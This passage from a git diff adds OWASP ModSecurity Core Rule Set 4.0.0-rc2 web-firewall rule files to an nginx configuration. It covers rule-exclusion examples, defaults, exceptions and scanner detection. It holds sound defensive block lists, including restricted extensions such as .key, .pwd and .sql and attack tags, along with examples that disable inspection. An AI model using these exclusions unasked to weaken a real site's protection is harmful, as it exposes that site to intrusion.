+# SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS
+#
+#
+# What follows are a group of examples that show you how to perform rule
+# exclusions.
+#
+#
+# Example Exclusion Rule: Disable inspection for an authorized client
+#
+# This ruleset allows you to control how ModSecurity will handle traffic
+# originating from Authorized Vulnerability Scanning (AVS) sources. See
+# related blog post -
+# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-advanced-topic-of-the-week-handling-authorized-scanning-traffic/
+#
+# Allow List ASV network block (no blocking or logging of AVS traffic) Update
+# IP network block as appropriate for your AVS traffic
+#
+# ModSec Rule Exclusion: Disable Rule Engine for known ASV IP
+# SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \
+# "id:1000,\
+# phase:1,\
+# pass,\
+# nolog,\
+# ctl:ruleEngine=Off"
+#
+#
+# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
+# for an individual rule
+#
+# This rule shows how to conditionally exclude the "password"
+# parameter for rule 942100 when the REQUEST_URI is /index.php
+# ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection
+#
+# SecRule REQUEST_URI "@beginsWith /index.php" \
+# "id:1001,\
+# phase:1,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveTargetById=942100;ARGS:password"
+#
+#
+# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
+# for only certain attacks
+#
+# Attack rules within the CRS are tagged, with tags such as 'attack-lfi',
+# 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera.
+#
+# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd
+# for all rules tagged attack-sqli
+# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
+# "id:1002,\
+# phase:2,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd"
+#
+
+# Example Exclusion Rule: Removing a specific ARGS parameter from inspection
+# for all CRS rules
+#
+# This rule illustrates that we can use tagging very effectively to allow list a
+# common false positive across an entire ModSecurity instance. This can be done
+# because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT
+# affect custom rules.
+#
+# ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd
+# for all CRS rules
+# SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
+# "id:1003,\
+# phase:2,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd"
+
+#
+# Example Exclusion Rule: Removing a range of rules
+#
+# This rule illustrates that we can remove a rule range via a ctl action.
+# This uses the fact, that rules are grouped by topic in rule files covering
+# a certain id range.
+# IMPORTANT: ModSecurity v3, aka libModSecurity, does not currently support the
+# use of rule ranges in a ruleRemoveById ctl action (this feature has been
+# planned for v3.1). Consider using ruleRemoveByTag as a workaround, if
+# appropriate.
+#
+# ModSecurity Rule Exclusion: Disable all SQLi and XSS rules
+# SecRule REQUEST_FILENAME "@beginsWith /admin" \
+# "id:1004,\
+# phase:2,\
+# pass,\
+# nolog,\
+# ctl:ruleRemoveById=941000-942999"
+#
+#
+# The application-specific rule exclusion plugins
+# (see: https://github.com/coreruleset/plugin-registry)
+# provide additional examples which can be useful then tuning a service.
+
+
+#
+# Example Rule: Allow monitoring tools and scripts
+#
+# Uncomment this rule to allow all requests from trusted IPs and User-Agent.
+# This can be useful for monitoring tools like Monit, Nagios, or other agents.
+# For example, if you're using AWS Load Balancer, you may need to trust all
+# requests from "10.0.0.0/8" subnet that come with the user-agent
+# "ELB-HealthChecker/2.0". By doing this, all requests that match these
+# conditions will not be matched against the following rules:
+#
+# - id: 911100 (allowed methods)
+# - id: 913100 (scan detection)
+# - id: 920280 (missing/empty host header)
+# - id: 920350 (IP address in host header)
+# - tag: attack-disclosure (all RESPONSE-*-DATA-LEAKAGES rules)
+#
+# SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" \
+# "id:1005,\
+# phase:1,\
+# pass,\
+# nolog,\
+# chain"
+# SecRule REQUEST_METHOD "@pm GET HEAD" "chain"
+# SecRule REQUEST_HEADERS:User-Agent "@pm ELB-HealthChecker" \
+# "ctl:ruleRemoveById=911100,\
+# ctl:ruleRemoveById=913100,\
+# ctl:ruleRemoveById=920280,\
+# ctl:ruleRemoveById=920350,\
+# ctl:ruleRemoveByTag=attack-disclosure"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-901-INITIALIZATION.conf b/nginx/config/owasp-crs/rules/REQUEST-901-INITIALIZATION.conf
new file mode 100644
index 00000000..498ad885
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-901-INITIALIZATION.conf
@@ -0,0 +1,427 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules
+# and performs preparatory actions. It also fixes errors and omissions
+# of variable definitions in the file crs-setup.conf.
+# The crs-setup.conf can and should be edited by the user, this file
+# is part of the CRS installation and should not be altered.
+#
+
+
+#
+# -=[ Rules Version ]=-
+#
+# Rule version data is added to the "Producer" line of Section H of the Audit log:
+#
+# - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
+#
+# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature
+#
+SecComponentSignature "OWASP_CRS/4.0.0-rc2"
+
+#
+# -=[ Default setup values ]=-
+#
+# The CRS checks the tx.crs_setup_version variable to ensure that the setup
+# file is included at the correct time. This detects situations where
+# necessary settings are not defined, for instance if the file
+# inclusion order is incorrect, or if the user has forgotten to
+# include the crs-setup.conf file.
+#
+# If you are upgrading from an earlier version of the CRS and you are
+# getting this error, please make a new copy of the setup template
+# crs-setup.conf.example to crs-setup.conf, and re-apply your policy
+# changes. There have been many changes in settings syntax from CRS2
+# to CRS3, so an old setup file may cause unwanted behavior.
+#
+# If you are not planning to use the crs-setup.conf template, you must
+# manually set the tx.crs_setup_version variable before including
+# the CRS rules/* files.
+#
+# The variable is a numerical representation of the CRS version number.
+# E.g., v3.0.0 is represented as 300.
+#
+
+SecRule &TX:crs_setup_version "@eq 0" \
+ "id:901001,\
+ phase:1,\
+ deny,\
+ status:500,\
+ log,\
+ auditlog,\
+ msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL'"
+
+
+#
+# -=[ Default setup values ]=-
+#
+# Some constructs or individual rules will fail if certain parameters
+# are not set in the crs-setup.conf file. The following rules will catch
+# these cases and assign sane default values.
+#
+
+# Default Inbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
+SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
+ "id:901100,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.inbound_anomaly_score_threshold=5'"
+
+# Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
+SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
+ "id:901110,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.outbound_anomaly_score_threshold=4'"
+
+# Default Reporting Level (rule 900115 in crs-setup.conf)
+SecRule &TX:reporting_level "@eq 0" \
+ "id:901111,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.reporting_level=4'"
+
+# Default Early Blocking (rule 900120 in crs-setup.conf)
+SecRule &TX:early_blocking "@eq 0" \
+ "id:901115,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.early_blocking=0'"
+
+# Default Blocking Paranoia Level (rule 900000 in crs-setup.conf)
+SecRule &TX:blocking_paranoia_level "@eq 0" \
+ "id:901120,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.blocking_paranoia_level=1'"
+
+# Default Detection Paranoia Level (rule 900001 in crs-setup.conf)
+SecRule &TX:detection_paranoia_level "@eq 0" \
+ "id:901125,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
+
+# Default Sampling Percentage (rule 900400 in crs-setup.conf)
+SecRule &TX:sampling_percentage "@eq 0" \
+ "id:901130,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.sampling_percentage=100'"
+
+# Default Anomaly Scores (rule 900100 in crs-setup.conf)
+SecRule &TX:critical_anomaly_score "@eq 0" \
+ "id:901140,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.critical_anomaly_score=5'"
+
+SecRule &TX:error_anomaly_score "@eq 0" \
+ "id:901141,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.error_anomaly_score=4'"
+
+SecRule &TX:warning_anomaly_score "@eq 0" \
+ "id:901142,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.warning_anomaly_score=3'"
+
+SecRule &TX:notice_anomaly_score "@eq 0" \
+ "id:901143,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.notice_anomaly_score=2'"
+
+# Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf)
+SecRule &TX:allowed_methods "@eq 0" \
+ "id:901160,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
+
+# Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf)
+SecRule &TX:allowed_request_content_type "@eq 0" \
+ "id:901162,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
+
+# Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf)
+SecRule &TX:allowed_request_content_type_charset "@eq 0" \
+ "id:901168,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'"
+
+# Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf)
+SecRule &TX:allowed_http_versions "@eq 0" \
+ "id:901163,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'"
+
+# Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf)
+SecRule &TX:restricted_extensions "@eq 0" \
+ "id:901164,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
+
+# Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf)
+SecRule &TX:restricted_headers_basic "@eq 0" \
+ "id:901165,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'"
+
+# Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf)
+SecRule &TX:restricted_headers_extended "@eq 0" \
+ "id:901171,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.restricted_headers_extended=/accept-charset/'"
+
+# Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf)
+SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
+ "id:901167,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.enforce_bodyproc_urlencoded=0'"
+
+# Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf)
+SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
+ "id:901169,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.crs_validate_utf8_encoding=0'"
+
+#
+# -=[ Initialize internal variables ]=-
+#
+
+# Initialize anomaly scoring variables.
+# All _score variables start at 0, and are incremented by the various rules
+# upon detection of a possible attack.
+
+SecAction \
+ "id:901200,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'tx.blocking_inbound_anomaly_score=0',\
+ setvar:'tx.detection_inbound_anomaly_score=0',\
+ setvar:'tx.inbound_anomaly_score_pl1=0',\
+ setvar:'tx.inbound_anomaly_score_pl2=0',\
+ setvar:'tx.inbound_anomaly_score_pl3=0',\
+ setvar:'tx.inbound_anomaly_score_pl4=0',\
+ setvar:'tx.sql_injection_score=0',\
+ setvar:'tx.xss_score=0',\
+ setvar:'tx.rfi_score=0',\
+ setvar:'tx.lfi_score=0',\
+ setvar:'tx.rce_score=0',\
+ setvar:'tx.php_injection_score=0',\
+ setvar:'tx.http_violation_score=0',\
+ setvar:'tx.session_fixation_score=0',\
+ setvar:'tx.blocking_outbound_anomaly_score=0',\
+ setvar:'tx.detection_outbound_anomaly_score=0',\
+ setvar:'tx.outbound_anomaly_score_pl1=0',\
+ setvar:'tx.outbound_anomaly_score_pl2=0',\
+ setvar:'tx.outbound_anomaly_score_pl3=0',\
+ setvar:'tx.outbound_anomaly_score_pl4=0',\
+ setvar:'tx.anomaly_score=0'"
+
+
+#
+# -=[ Initialize collections ]=-
+#
+# Create both Global and IP collections for rules to use.
+# Some plugins assume that these two collections have already
+# been initialized.
+# IP collection is initialized with the IP address concatened with the hashed user agent.
+
+# Disable collection initialization by default (see rule 900130 in crs-setup.conf)
+SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \
+ "id:901320,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ chain"
+ SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \
+ "t:none,t:sha1,t:hexEncode,\
+ initcol:global=global,\
+ initcol:ip=%{remote_addr}_%{MATCHED_VAR}"
+
+#
+# -=[ Initialize Correct Body Processing ]=-
+#
+# Force request body variable and optionally request body processor
+#
+
+# Force body variable
+SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
+ "id:901340,\
+ phase:1,\
+ pass,\
+ nolog,\
+ noauditlog,\
+ msg:'Enabling body inspection',\
+ ctl:forceRequestBodyVariable=On,\
+ ver:'OWASP_CRS/4.0.0-rc2'"
+
+# Force body processor URLENCODED
+SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
+ "id:901350,\
+ phase:1,\
+ pass,\
+ t:none,t:urlDecodeUni,\
+ nolog,\
+ noauditlog,\
+ msg:'Enabling forced body inspection for ASCII content',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ chain"
+ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
+ "ctl:requestBodyProcessor=URLENCODED"
+
+
+#
+# -=[ Easing In / Sampling Percentage ]=-
+#
+# This is used to send only a limited percentage of requests into the Core
+# Rule Set. The selection is based on TX.sampling_percentage and a pseudo
+# random number calculated below.
+#
+# Use this to ease into a new Core Rules installation with an existing
+# productive service.
+#
+# See
+# https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/
+#
+
+#
+# Generate the pseudo random number
+#
+# ATTENTION: This is no cryptographically secure random number. It's just
+# a cheap way to get some random number suitable for sampling.
+#
+# We take the entropy contained in the UNIQUE_ID. We hash that variable and
+# take the first integer numbers out of it. Theoretically, it is possible
+# but highly improbable that there are no integers in a hexEncoded sha1 hash.
+# In the very rare event that two integers are not matched (due to only being
+# a-f in all, or all but one positions) 901450 will not be triggered.
+# Leading zeros are not removed from the two-digit random number, and are
+# handled gracefullly by 901450
+
+SecRule TX:sampling_percentage "@eq 100" \
+ "id:901400,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ skipAfter:END-SAMPLING"
+
+SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
+ "id:901410,\
+ phase:1,\
+ pass,\
+ capture,\
+ t:sha1,t:hexEncode,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"
+
+#
+# Sampling decision
+#
+# If a request is allowed to pass without being checked by the CRS, there is no
+# entry in the audit log (for performance reasons), but an error log entry is
+# being written. If you want to disable the error log entry, then issue the
+# following directive somewhere after the inclusion of the CRS
+# (E.g., RESPONSE-999-EXCEPTIONS.conf).
+#
+# SecRuleUpdateActionById 901450 "nolog"
+#
+
+
+SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
+ "id:901450,\
+ phase:1,\
+ pass,\
+ log,\
+ noauditlog,\
+ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
+ ctl:ruleRemoveByTag=OWASP_CRS,\
+ ver:'OWASP_CRS/4.0.0-rc2'"
+
+SecMarker "END-SAMPLING"
+
+
+#
+# Configuration Plausibility Checks
+#
+
+# Make sure detection paranoia level is not lower than paranoia level
+SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \
+ "id:901500,\
+ phase:1,\
+ deny,\
+ status:500,\
+ t:none,\
+ log,\
+ msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
+ ver:'OWASP_CRS/4.0.0-rc2'"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/nginx/config/owasp-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
new file mode 100644
index 00000000..5af67b03
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
@@ -0,0 +1,55 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+
+# This file is used as an exception mechanism to remove common false positives
+# that may be encountered.
+#
+# Exception for Apache SSL pinger
+#
+SecRule REQUEST_LINE "@streq GET /" \
+ "id:905100,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-apache',\
+ tag:'attack-generic',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ chain"
+ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
+ "t:none,\
+ ctl:ruleRemoveByTag=OWASP_CRS,\
+ ctl:auditEngine=Off"
+
+#
+# Exception for Apache internal dummy connection
+#
+SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \
+ "id:905110,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-apache',\
+ tag:'attack-generic',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ chain"
+ SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \
+ "t:none,\
+ chain"
+ SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \
+ "t:none,\
+ ctl:ruleRemoveByTag=OWASP_CRS,\
+ ctl:auditEngine=Off"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/nginx/config/owasp-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
new file mode 100644
index 00000000..2831bc0f
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
@@ -0,0 +1,76 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ Allowed Request Methods ]=-
+#
+# tx.allowed_methods is defined in the crs-setup.conf file
+#
+SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
+ "id:911100,\
+ phase:1,\
+ block,\
+ msg:'Method is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-generic',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/274',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-913-SCANNER-DETECTION.conf b/nginx/config/owasp-crs/rules/REQUEST-913-SCANNER-DETECTION.conf
new file mode 100644
index 00000000..519634ab
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-913-SCANNER-DETECTION.conf
@@ -0,0 +1,86 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ Security Scanner Checks ]=-
+#
+# This rule inspects the default User-Agent and Header values sent by
+# various commercial and open source scanners, mostly
+# security / vulnerability scanners.
+#
+# It is based on a curated list of known malicious scanners in widespread use.
+# This list is maintained in scanners-user-agents.data.
+#
+# With CRSv4, the project has given up on keeping track of different categories
+# of scanners and scripting agents, mostly because it's very hard to draw
+# a line between benign, mostly benign and malicious. And because dedicated
+# attackers will change the user agent anyways.
+
+SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \
+ "id:913100,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Found User-Agent associated with security scanner',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-scanner',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/118/224/541/310',\
+ tag:'PCI/6.5.10',\
+ ver:'OWASP_CRS/4.0.0-rc2',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-913-SCANNER-DETECTION"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/nginx/config/owasp-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
new file mode 100644
index 00000000..93981872
--- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf 
@@ -0,0 +1,1865 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# Some protocol violations are common in application layer attacks.
+# Validating HTTP requests eliminates a large number of application layer attacks.
+#
+# The purpose of this rules file is to enforce HTTP RFC requirements that state how
